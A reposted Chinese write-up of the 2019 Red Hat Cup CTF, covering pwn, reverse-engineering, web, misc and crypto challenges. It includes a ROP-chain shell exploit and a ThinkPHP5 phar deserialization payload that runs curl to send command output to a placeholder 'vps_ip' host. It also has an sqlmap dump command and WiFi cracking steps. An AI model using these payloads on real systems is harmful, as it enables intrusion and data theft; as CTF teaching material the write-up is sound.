2019红帽杯wp

admin

135190
文章

109
评论

2024年8月18日01:24:27评论12 views字数 8031阅读26分46秒阅读模式

前言

上个周末打了个红帽杯，题目还是一如既往地难，菜鸡还是一如既往地菜Orz，放下队内wp

PWN

three

静态编译文件，开了NX
2019红帽杯wp
有一个3字节的shellcode可以操作；在Tell me的时候写入ropchain，再执行shellcode跳转到0x80f6cc0执行ropchain
exp如下

#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack

# Padding goes here
p = ''
p += pack('<I', 0x08072f8b) # pop edx ; ret
p += pack('<I', 0x080f5000) # @ .data
p += pack('<I', 0x080c11e6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080573e5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08072f8b) # pop edx ; ret
p += pack('<I', 0x080f5004) # @ .data + 4
p += pack('<I', 0x080c11e6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080573e5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08072f8b) # pop edx ; ret
p += pack('<I', 0x080f5008) # @ .data + 8
p += pack('<I', 0x080569a0) # xor eax, eax ; ret
p += pack('<I', 0x080573e5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481d9) # pop ebx ; ret
p += pack('<I', 0x080f5000) # @ .data
p += pack('<I', 0x08072fb2) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080f5008) # @ .data + 8
p += pack('<I', 0x080f5000) # padding without overwrite ebx
p += pack('<I', 0x08072f8b) # pop edx ; ret
p += pack('<I', 0x080f5008) # @ .data + 8
p += pack('<I', 0x080569a0) # xor eax, eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x0808041a) # inc eax ; ret
p += pack('<I', 0x08049903) # int 0x80

from pwn import *
context.log_level = 'debug'
# io = process('./pwn')
io = remote("47.104.190.38","12001")

sd = lambda s:io.send(s)
sl = lambda s:io.sendline(s)
rc = lambda s:io.recv(s)
ru = lambda s:io.recvuntil(s)
sda = lambda a,s:io.sendafter(a,s)
sla = lambda a,s:io.sendlineafter(a,s)

ru("index:\n")
sl('0')
ru("much!\n")
sl("\x89\xcc\xc3")
ru("size:\n")
sl(str(0x200))
ru("me:\n")
# gdb.attach(io,"b *0x8048C50")
sl(p)

io.interactive()

RE

easyRE

一开始被坑了，base64一直解密出来一个网站，发现找不到flag，后来想到第一个输入的hint是找flag头，于是一个个找，发现了真正的主逻辑：
2019红帽杯wp
先通过flag字符和table前四个数异或解出key，这里把table和key字符异或就可出了：

cc = ""
t = [0x40, 0x35, 0x20, 0x56, 0x5D, 0x18, 0x22, 0x45, 0x17, 0x2F, 0x24, 0x6E, 0x62, 0x3C, 0x27, 0x54, 0x48, 0x6C, 0x24, 0x6E, 0x72, 0x3C, 0x32, 0x45,0x5B]
key = 0x26594131
k = [0x26,0x59,0x41,0x31]
for j in range(len(t)):
  cc += chr(t[j] ^ k[j % 4])
print cc

xx

这题一共3关，第一关xxtea，根据输入是完整格式flag{xxxxxxxxxxxx}，而key是取了输入的前4字节，所以可以动态调试，可以提取出key就是flag\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00，知道密文即可解密出来；第二关是置换这个简单，第三关是迭代异或，这里动态调试跟汇编得到计算过程：
2019红帽杯wp
接着有个cmp的比较，所以我们知道密文，可以逆向解迭代异或，再置换，再xxtea解密即可得到flag

#coding=utf8
import struct

message = '\xbc\xa5\xce\x40\xf4\xb2\xb2\xe7\xa9\x12\x9d\x12\xae\x10\xc8\x5b\x3d\xd7\x06\x1d\xdc\x70\xf8\xdc'

key = "flag\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

data = 0x9E3779B9 

def _long2str(v, w):  
    n = (len(v) - 1) << 2  
    if w:  
        m = v[-1]  
        if (m < n - 3) or (m > n): return ''  
        n = m  
    s = struct.pack('<%iL' % len(v), *v)  
    return s[0:n] if w else s  

def _str2long(s, w):  
    n = len(s)  
    m = (4 - (n & 3) & 3) + n  
    s = s.ljust(m, "\x00")  
    v = list(struct.unpack('<%iL' % (m >> 2), s))  
    if w: v.append(n)  
    return v   

def decrypt(str, key):  
    if str == '': return str  
    v = _str2long(str, False)  
    k = _str2long(key.ljust(16, "\x00"), False)  
    n = len(v) - 1  
    z = v[n]  
    y = v[0]  
    q = 6 + 52 // (n + 1)  
    sum = (q * data) & 0xffffffff  
    while (sum != 0):  
        e = sum >> 2 & 3  
        for p in xrange(n, 0, -1):  
            z = v
  
            v
 = (v
 - ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k
 ^ z))) & 0xffffffff  
            y = v
  
        z = v[n]  
        v[0] = (v[0] - ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k[0 & 3 ^ e] ^ z))) & 0xffffffff  
        y = v[0]  
        sum = (sum - data) & 0xffffffff  
    return _long2str(v, True)  

if __name__ == "__main__":
    flag = decrypt(message,key)
    print flag

childRE

直接分析主逻辑
2019红帽杯wp
这题有3关，第一关对输入进行了一个排序算法，这个好逆，第二关是把排完序的字符串进行了一个函数名扩展修饰，使得31位的输入变成了62位，再进行了一个简单的check(这里直接爆破即可)

string = []
k = 0
for m in range(62):
for i in range(1000):
k = i % 23
p = i / 23
if table
==a[m]:
if table[k]==b[m]:
string.append(i)
break
u = ''
for i in string:
u += chr(i)
print u
#"private: char * __thiscall R0Pxx::My_Aut0_PWN(unsigned char *)"

难点在于那个C++的函数名修饰扩展，这个自学了一波，写了个还原成未修饰的字符的程序

#include <iostream>
using namespace std;
class R0Pxx {
public:
R0Pxx(int val) {
unsigned char a = 0x41;
My_Aut0_PWN(&a);
}

private:
char* __thiscall My_Aut0_PWN(unsigned char* a) {
cout << "hello !";
printf("Decorated function name: %s\n", __FUNCDNAME__);
printf("Function signature: %s\n", __FUNCSIG__);
return 0;
};

};
int main() {
R0Pxx ropxx(1);
return 0;
}

2019红帽杯wp
得到了排序后的字符：”?My_Aut0_PWN@R0Pxx@@AAEPADPAE@Z”，排序算法直接用小技巧：kk = “0123456789abcdefghijklmnopqrstu”，gg = “fg7hi83jk9lma41nobpqc5rsdtue620”就可知道原来字符的位置，所以直接替换位置既可得到：
Z0@tRAEyuP@xAAA?M_A0_WNPx@@EPDP
最后MD5加密下得到flag：
flag{63b148e750fed3a33419168ac58083f5}

calc

这题作者自己实现了一个大数运算，有3次输入，每次输入一个大整数，既可得到flag，然后通过调试和分析可以得到搞出关键性的check，前面的计算没有用到，白分析了
哎，直接看分析出来的关键性check

((input1 + input2) * (input1 + input2) * (input1 + input2) - 3 * input1 * input2 * input2 - 3 * input2 * input1 * input1 == ((4 + input3) * (4 + input3) * (4 + input3) - (input3 * input3) * 12 - 48 * input3 - 22))

我们用x1，x2和x3表示3个输入，然后化简得到

1	(x1+x2)^3-3x1x2x3-3x2x1^2==(4+x3)^3-12x3^2-48*x3-22

将3次幂拆分成2次幂，然后再化简约去同类项可得：x1^3 + x2^3 +(-x3)^3 = 42，这里一开始用z3跑，用symp都跑不出来，申请写了3个for循环爆破，但是都出不了，后面上网谷歌，找到一篇文章:：https://zhuanlan.zhihu.com/p/81655767
2019红帽杯wp
所以直接得到3个数：

1
2
3

x1= 80435758145817515
x2=12602123297335631
x3= 80538738812075974

输入程序最后拿到flag：flag{951e27be2b2f10b7fa22a6dc8f4682bd}

WEB

ticket_system

首先有个xxe注入的地方，利用postXML去读源文件
2019红帽杯wp
把源文件和readflag文件读下来以后可以分析出，攻击过程是上传一个可执行的php，通过thinkphp5的pop链和phar去触发反序列化漏洞
readflag文件和*ctf那题一模一样，直接拿当初的脚本就行了

<?php
$descriptorspec = array(
    0 => array("pipe", "r"),
    1 => array("pipe", "w"),
    2 => array("file", "/tmp/error-output.txt", "a")
);
$process = proc_open('/readflag', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    $question = fread($pipes[1],1024);
    $question = fread($pipes[1],1024);
    $question = trim($question);
    echo $question;
    eval('$result = '.$question.';');
    fwrite($pipes[0], $result);
    fclose($pipes[0]);
    $flag = fread($pipes[1],1024);
    $flag = fread($pipes[1],1024);
    $flag = fread($pipes[1],1024);
    echo $flag;
    fclose($pipes[1]);  
    $return_value = proc_close($process);
    echo $return_value;
}
?>

上传过去以后拿微笑师傅的pop链打过去

<?php
namespace think\process\pipes {
    class Windows
    {
        private $files;
        public function __construct($files)
        {
            $this->files = array($files);
        }
    }
}

namespace think\model\concern {
    trait Conversion
    {
        protected $append = array("Smi1e" => "1");
    }

    trait Attribute
    {
        private $data;
        private $withAttr = array("Smi1e" => "system");

        public function get($system)
        {
            $this->data = array("Smi1e" => "$system");
        }
    }
}
namespace think {
    abstract class Model
    {
        use model\concern\Attribute;
        use model\concern\Conversion;
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model
    {
        public function __construct($system)
        {
            $this->get($system);
        }
    }
}

namespace {
    $Conver = new think\model\Pivot("curl http://vps_ip:2334/ -d `php /tmp/uploads/0cc175b9c0f1b6a831c399e269772661/20191111/6582f47189690b9acfc01cc069af8ea8.xml|tac|tr -d \"\\n\"|sed 's/ //g'`;");
    $payload = new think\process\pipes\Windows($Conver);
    @unlink("phar.phar");
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); //设置stub
    $phar->setMetadata($payload); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
    echo urlencode(serialize($payload));
}

2019红帽杯wp

easyweb

找xyhcms源码挖洞

1	sqlmap.py -u http//xxx/index.php?s=api/lt/gbooklist&orderby=* --technique=B --tamper between -D xyhcms -T fl4g -C flaag --dump

MISC

签到

填个问卷就行

Advertising for Marriage

首先是浏览文件，然后看到有张vegetable.png
2019红帽杯wp
把这张图片dump下来以后在linux里面是打不开的，提示CRC错误，通过CRC码爆破出高度是D3

在notepad里面看到一段hint

然后图片去模糊出来的不是对的flag，到这里似乎卡住了，放去stego看一下，每个RGB通道都有一段干扰的信息，猜测是lsb隐写
2019红帽杯wp
那秘钥是什么呢，估计是前面的hint那段，剩下的就是找前四个是什么字母了
再继续看进程看见有个画图进程

把它dump下来用gimp打开看到是

接下来就是lsb恢复加密的数据（这里吐槽一波出题人英语不好，friend打错了，结果弄了一个晚上才发现是错的….dbq或许他不缺女朋友
2019红帽杯wp
base64解密以后提示维吉尼亚，gnxtmwg7r1417psedbs62587h0，密钥：bcxneedmoneyandgirlfirend，解密就能得到flag：d7f1417bfafbf62587e0

恶臭的数据包

拿到数据包发现全是wifi加密的流量，马上想到

1	aircrack-ng cacosmia.cap

发现数据包网路名称是mamawoxiangwantiequan，然后想到爆破八位的wifi密码提取原包，本来生成了个700多m的字典去爆，发现要10h就直接顺手先试试弱密码12345678，解出源包cacosmia-dec.cap
2019红帽杯wp
然后提取http协议传输的文件，binwalk最大那个发现一张图和一个加密压缩包，找到传压缩包的tcp流，发现cookie中JWT有hint，压缩包密码是ping的网址

过滤dns协议网址，一个个试，找到最后一个就是密码

解压出flag，flag{f14376d0-793e-4e20-9eab-af23f3fdc158}

CRYPTO

boardcast

出题人失误，源文件直接放了flag
2019红帽杯wp
剩下的密码学好难啊，只能等大佬们的wp复现了

FROM:Xi4or0uji

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

2019红帽杯wp

前言

PWN

three

RE

easyRE

xx

childRE

calc

WEB

ticket_system

easyweb

MISC

签到

Advertising for Marriage

恶臭的数据包

CRYPTO

boardcast

中文字符形近字的研究

CTF 大神才知道的 50 个解题骚套路，速速收藏！

2025-2月Solar应急响应官方题解

AliyunCTF2025 题解之 Jtools Fury 反序列化利用分析

DDCTF 2020 WEB WriteUp

2022 DASCTF X SU 三月春季挑战赛 ezpop writeup

【WP】第二届红明谷杯数据安全大赛题目解析（三）

2022DASCTF x SU 三月春季挑战赛 WP

2021MTCTF-Blindbox复现学习

RWCTF 体验赛 the Real Menu Challenge & Blockchain方向解答过程

发表评论

在线咨询

微信